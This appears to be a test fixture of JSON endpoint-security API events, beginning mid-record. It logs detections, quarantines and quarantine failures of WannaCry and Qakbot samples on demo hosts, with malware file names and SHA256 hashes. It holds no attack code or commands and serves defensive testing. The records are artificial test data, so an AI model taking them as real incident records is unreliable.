Detection","event_type_id":553648147,"detection":"W32.Variant:Gen.20gl.1201","detection_id":"6419247189909831755","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\Windows\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}}
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419247189909832000,"timestamp":1610639423,"timestamp_nanoseconds":888000000,"date":"2021-01-14T15:50:23+00:00","event_type":"Retrospective Detection","event_type_id":553648147,"detection":"W32.Variant:Gen.20gl.1201","detection_id":"6419247189909831754","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}}
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419247189909832000,"timestamp":1610639423,"timestamp_nanoseconds":873000000,"date":"2021-01-14T15:50:23+00:00","event_type":"Retrospective Detection","event_type_id":553648147,"detection":"W32.Variant:Gen.20gl.1201","detection_id":"6419247189909831753","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"qeriuwjhrf","file_path":"\\\\?\\C:\\Windows\\qeriuwjhrf","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}}
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419247189909832000,"timestamp":1610639423,"timestamp_nanoseconds":732000000,"date":"2021-01-14T15:50:23+00:00","event_type":"Retrospective Detection","event_type_id":553648147,"detection":"W32.Variant:Gen.20gl.1201","detection_id":"6419229327140847658","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\Windows\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}}
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419247189909832000,"timestamp":1610639423,"timestamp_nanoseconds":717000000,"date":"2021-01-14T15:50:23+00:00","event_type":"Retrospective Detection","event_type_id":553648147,"detection":"W32.Variant:Gen.20gl.1201","detection_id":"6419204897366867969","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\Windows\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}}
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419247189909832000,"timestamp":1610639423,"timestamp_nanoseconds":686000000,"date":"2021-01-14T15:50:23+00:00","event_type":"Retrospective Detection","event_type_id":553648147,"detection":"W32.Variant:Gen.20gl.1201","detection_id":"6419179204872503298","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\Windows\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}}
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419247189909832000,"timestamp":1610639423,"timestamp_nanoseconds":639000000,"date":"2021-01-14T15:50:23+00:00","event_type":"Retrospective Detection","event_type_id":553648147,"detection":"W32.Variant:Gen.20gl.1201","detection_id":"6419204897366867977","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}}
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6412604589194871000,"timestamp":1610637865,"timestamp_nanoseconds":994000000,"date":"2021-01-14T15:24:25+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6412604589194870787","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_3","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"02:2f:e0:10:03:5d"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446"}}}}
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6412604589194871000,"timestamp":1610637865,"timestamp_nanoseconds":573000000,"date":"2021-01-14T15:24:25+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6412604589194870787","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_3","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"02:2f:e0:10:03:5d"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"QuotaGroup.exe","file_path":"\\\\?\\C:\\Users\\johndoe\\AppData\\Local\\QuotaGroup\\QuotaGroup.exe","identity":{"sha256":"d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446","sha1":"f5a171c879b90e77861daf19741b373646d791ff","md5":"32c9e6737dbdcbfb7563a3f27e2b1571"}}}}
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6412604589194871000,"timestamp":1610637865,"timestamp_nanoseconds":479000000,"date":"2021-01-14T15:24:25+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6412604589194870786","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_3","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"02:2f:e0:10:03:5d"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"","file_path":"","identity":{"sha256":"d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446"}}}}
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6412604589194871000,"timestamp":1610637865,"timestamp_nanoseconds":479000000,"date":"2021-01-14T15:24:25+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6412604589194870785","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_3","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"02:2f:e0:10:03:5d"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"QuotaGroup.exe","file_path":"\\\\?\\C:\\Users\\johndoe\\AppData\\Local\\QuotaGroup\\QuotaGroup.exe","identity":{"sha256":"d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446","sha1":"f5a171c879b90e77861daf19741b373646d791ff","md5":"32c9e6737dbdcbfb7563a3f27e2b1571"}}}}
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6412604589194871000,"timestamp":1610637865,"timestamp_nanoseconds":994000000,"date":"2021-01-14T15:24:25+00:00","event_type":"Threat Quarantined","event_type_id":553648143,"detection_id":"6412604589194870785","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_3","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"02:2f:e0:10:03:5d"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446"}}}}
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419239055241773000,"timestamp":1610637529,"timestamp_nanoseconds":242000000,"date":"2021-01-14T15:18:49+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419239055241773128","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c"}}}}
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419239055241773000,"timestamp":1610637529,"timestamp_nanoseconds":242000000,"date":"2021-01-14T15:18:49+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.Gen.20gl.1201","detection_id":"6419239055241773128","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"mssecsvc.exe","file_path":"\\\\?\\C:\\WINDOWS\\mssecsvc.exe","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c"},"parent":{"process_id":708,"disposition":"Clean","file_name":"lsass.exe","identity":{"sha256":"26f36ca31a1b977685f8df5f8436848b7d4143b47ec0dae68f8382c1b52a6c71","sha1":"7abcc82dc5a05b4f53fd0fbd386738e5555025cf","md5":"4e568dbe3fff1a0025eb432dc929b78f"}}}}}
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419239050946806000,"timestamp":1610637528,"timestamp_nanoseconds":587000000,"date":"2021-01-14T15:18:48+00:00","event_type":"Threat Quarantined","event_type_id":553648143,"detection_id":"6419239046651838535","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c"}}}}
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419229335730782000,"timestamp":1610635266,"timestamp_nanoseconds":87000000,"date":"2021-01-14T14:41:06+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419229331435814971","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}}
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419229335730782000,"timestamp":1610635266,"timestamp_nanoseconds":56000000,"date":"2021-01-14T14:41:06+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419229331435814970","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}}
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419229335730782000,"timestamp":1610635266,"timestamp_nanoseconds":773000000,"date":"2021-01-14T14:41:06+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6419229335730782278","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}}
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419229335730782000,"timestamp":1610635266,"timestamp_nanoseconds":648000000,"date":"2021-01-14T14:41:06+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6419229335730782277","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}}
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419229335730782000,"timestamp":1610635266,"timestamp_nanoseconds":570000000,"date":"2021-01-14T14:41:06+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6419229335730782276","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}}
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419229335730782000,"timestamp":1610635266,"timestamp_nanoseconds":414000000,"date":"2021-01-14T14:41:06+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6419229335730782275","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}}
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419229335730782000,"timestamp":1610635266,"timestamp_nanoseconds":368000000,"date":"2021-01-14T14:41:06+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6419229335730782274","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}}
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419229335730782000,"timestamp":1610635266,"timestamp_nanoseconds":134000000,"date":"2021-01-14T14:41:06+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6419229335730782273","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}}
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419229335730782000,"timestamp":1610635266,"timestamp_nanoseconds":87000000,"date":"2021-01-14T14:41:06+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6419229335730782272","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}}
